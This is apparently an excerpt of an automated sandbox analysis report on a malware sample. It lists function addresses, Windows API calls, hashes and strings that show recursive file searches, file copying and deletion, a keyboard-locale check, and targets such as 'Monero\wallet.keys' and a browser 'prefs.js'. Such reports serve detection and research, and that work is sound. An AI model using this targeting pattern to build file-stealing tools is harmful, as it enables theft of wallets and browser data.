                              • Opcode ID: 43a5172cdb4ec55f946a518936ba70be42abd2f7459b653d66a02748df21c704
                              • Instruction ID: 8802d8de31c8e2950c18f5b3bdfbc9445d7186173fb262c1a008119f23874088
                              • Opcode Fuzzy Hash: 43a5172cdb4ec55f946a518936ba70be42abd2f7459b653d66a02748df21c704
                              • Instruction Fuzzy Hash: BE6132B2910218ABCB24EBA0DC49FEE737CBB58701F048589F50996181EB75AB85CFD1
                              Function 00A64570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A64580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A64587
                              • wsprintfA.USER32 ref: 00A645A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 00A645BD
                              • StrCmpCA.SHLWAPI(?,00A70FC4), ref: 00A645EB
                              • StrCmpCA.SHLWAPI(?,00A70FC8), ref: 00A64601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A6468B
                              • FindClose.KERNEL32(000000FF), ref: 00A646A0
                              • lstrcat.KERNEL32(?,0144F1F0), ref: 00A646C5
                              • lstrcat.KERNEL32(?,0144DDE0), ref: 00A646D8
                              • lstrlen.KERNEL32(?), ref: 00A646E5
                              • lstrlen.KERNEL32(?), ref: 00A646F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 3c15db0ca7116b86887c50bac88a477f8e35d9643d63c9ab85a9820dbf3cd736
                              • Instruction ID: ae760ac5e73cd4b6274940404553c4ea76d104c222a5994aeac0f8f0bc6a02da
                              • Opcode Fuzzy Hash: 3c15db0ca7116b86887c50bac88a477f8e35d9643d63c9ab85a9820dbf3cd736
                              • Instruction Fuzzy Hash: 515146B6950218ABCB24EBB0DD8DFED737CBB58700F404589F60996190EB749B84CF92
                              Function 00A63EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00A63EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00A63EDA
                              • StrCmpCA.SHLWAPI(?,00A70FAC), ref: 00A63F08
                              • StrCmpCA.SHLWAPI(?,00A70FB0), ref: 00A63F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A6406C
                              • FindClose.KERNEL32(000000FF), ref: 00A64081
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 4c7001b184ac3b1c373cdc92032f35f1c4014b376e47e9957461b56d6e583476
                              • Instruction ID: d911a8195c3b29f04bdf45b726aee62647fda602368d82149efe0a6276d6ef51
                              • Opcode Fuzzy Hash: 4c7001b184ac3b1c373cdc92032f35f1c4014b376e47e9957461b56d6e583476
                              • Instruction Fuzzy Hash: 66515AB2910218ABCF24EBB0DD49FEE737CBB58700F048589B65996080EB75DB85CF95
                              Function 00A5ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00A5ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 00A5ED55
                              • StrCmpCA.SHLWAPI(?,00A71538), ref: 00A5EDAB
                              • StrCmpCA.SHLWAPI(?,00A7153C), ref: 00A5EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5F2AE
                              • FindClose.KERNEL32(000000FF), ref: 00A5F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 44c62d7daff304da259e8c2256e9cd30534a962359df7695d6d7c89e0a354db9
                              • Instruction ID: 8a5afd078cb6ff3e1b00d7ab9a5a3c16e5be79ac76249d0f33511caa3ea31899
                              • Opcode Fuzzy Hash: 44c62d7daff304da259e8c2256e9cd30534a962359df7695d6d7c89e0a354db9
                              • Instruction Fuzzy Hash: 40E1B2729111189ADB58FB60DE56EEE737CAF64300F404599B51A73092EF306F8ACF92
                              Function 00A5F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A715B8,00A70D96), ref: 00A5F71E
                              • StrCmpCA.SHLWAPI(?,00A715BC), ref: 00A5F76F
                              • StrCmpCA.SHLWAPI(?,00A715C0), ref: 00A5F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5FAB1
                              • FindClose.KERNEL32(000000FF), ref: 00A5FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 1ea9d8afcf2f320be4889839f5ba70ddea05e736ea47cb55522b72a6784a92f0
                              • Instruction ID: f02282d3645934face6b4d720a09149b822671f0780308f1e7b7c2df7ad33dba
                              • Opcode Fuzzy Hash: 1ea9d8afcf2f320be4889839f5ba70ddea05e736ea47cb55522b72a6784a92f0
                              • Instruction Fuzzy Hash: 90B123719001049FDB24FF64DD96BEE7379BF64300F5085A9A90AA7191EF306B49CF92
                              Function 00A516D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A7510C,?,?,?,00A751B4,?,?,00000000,?,00000000), ref: 00A51923
                              • StrCmpCA.SHLWAPI(?,00A7525C), ref: 00A51973
                              • StrCmpCA.SHLWAPI(?,00A75304), ref: 00A51989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A51D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00A51DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A51E20
                              • FindClose.KERNEL32(000000FF), ref: 00A51E32
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 324ce63912a758f0a092f56864a5c13cafa1178dfa85a032f28239152de12260
                              • Instruction ID: 4ab1d6e61b9a59ad777817fad118836d5899320f55cb3b87615bd5e0610b12d7
                              • Opcode Fuzzy Hash: 324ce63912a758f0a092f56864a5c13cafa1178dfa85a032f28239152de12260
                              • Instruction Fuzzy Hash: C812FE72910118ABDB19FB60CE96EEE7378AF64300F504599B51A73091EF706F89CFA1
                              Function 00A5DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00A70C2E), ref: 00A5DE5E
                              • StrCmpCA.SHLWAPI(?,00A714C8), ref: 00A5DEAE
                              • StrCmpCA.SHLWAPI(?,00A714CC), ref: 00A5DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5E3E0
                              • FindClose.KERNEL32(000000FF), ref: 00A5E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: ac1408ed026c049fae9c7a43a3eb704cfb3302afc0b8638ea7096d5e3e2f0b30
                              • Instruction ID: e4d3a45891ef5a04aa9ff1ce1a82209b2ee0c913039e8917fa6ccc478f59ea9f
                              • Opcode Fuzzy Hash: ac1408ed026c049fae9c7a43a3eb704cfb3302afc0b8638ea7096d5e3e2f0b30
                              • Instruction Fuzzy Hash: 9FF1A0729101189ADB15FB60DE96EEE7378BF24300F9045DAB51A72091EF306F8ACF52
                              Function 00A5DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A714B0,00A70C2A), ref: 00A5DAEB
                              • StrCmpCA.SHLWAPI(?,00A714B4), ref: 00A5DB33
                              • StrCmpCA.SHLWAPI(?,00A714B8), ref: 00A5DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5DDCC
                              • FindClose.KERNEL32(000000FF), ref: 00A5DDDE
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 4c79380611f2e08736f1b8a2e7a29e42b01e63ef1ee0183a247b913ca0f1f32f
                              • Instruction ID: b7c743fd8755aa6a7e3ec0155018d6345b6b2706e501c4bef0b666632c50c25c
                              • Opcode Fuzzy Hash: 4c79380611f2e08736f1b8a2e7a29e42b01e63ef1ee0183a247b913ca0f1f32f
                              • Instruction Fuzzy Hash: F0910472900104ABCB14FF70ED5AAED737DABA4301F408659F91AA6181EE349B5DCF92
                              Function 00A67B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,00A705AF), ref: 00A67BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00A67BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00A67C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00A67C62
                              • LocalFree.KERNEL32(00000000), ref: 00A67D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: fa41f68b7ec8c469a08c5fe3feea1e9f57a3e9be60fcab31c0c9daed8f3543af
                              • Instruction ID: 3c49d05ffb2570004abd6d9caa4170ecf4fed88f6f73c70ff556c0a990d1b712
                              • Opcode Fuzzy Hash: fa41f68b7ec8c469a08c5fe3feea1e9f57a3e9be60fcab31c0c9daed8f3543af
                              • Instruction Fuzzy Hash: BA415C71950218ABCB24DF94DD99BEEB3B8FF54704F204599E109B2191DB342F85CFA1
                              Function 00A5E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00A70D73), ref: 00A5E4A2
                              • StrCmpCA.SHLWAPI(?,00A714F8), ref: 00A5E4F2
                              • StrCmpCA.SHLWAPI(?,00A714FC), ref: 00A5E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
